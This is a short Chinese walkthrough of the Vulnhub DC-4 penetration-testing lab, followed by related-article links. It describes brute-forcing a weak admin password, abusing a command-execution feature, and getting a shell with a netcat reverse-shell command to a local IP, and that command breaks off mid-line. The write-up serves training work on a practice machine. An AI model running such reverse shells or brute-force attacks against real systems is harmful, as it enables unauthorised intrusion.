Vulnhub滲透測試靶機DC-4
下載地址:https://www.vulnhub.com/entry/dc-4,313/ nmap沒有掃描到什麼有用端口 直接訪問80端口 只有一個認證框 沒有驗證 bp爆破admin弱密碼 發現密碼admin qwert 進入後臺 發現有執行命令的地方 抓包發現命令由post包傳過去 執行的命令由客戶端傳到了服務端 命令執行獲取shell 把nc -e /bin/sh 192.168.49.12
相關文章
- 1. 【滲透測試】靶機滲透Vulnhub-bulldog
- 2. vulnhub之DC4靶機
- 3. vulnhub滲透測試靶機prime-1
- 4. vulnhub滲透測試靶機DC-8
- 5. vulnhub滲透測試靶機DC-6
- 6. Vulnhub滲透測試靶機DC-5
- 7. vulnhub滲透測試靶機DC-3
- 8. vulnhub滲透測試靶機DC-7
- 9. vulnhub系列靶機--DC4
- 10. 滲透:vulnhub-XXE 靶機
- 更多相關文章...
- • Maven 構建 & 項目測試 - Maven教程
- • Lua 調試(Debug) - Lua 教程
- • 漫談MySQL的鎖機制
- • 爲了進字節跳動,我精選了29道Java經典算法題,帶詳細講解
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
歡迎關注本站公眾號,獲取更多信息
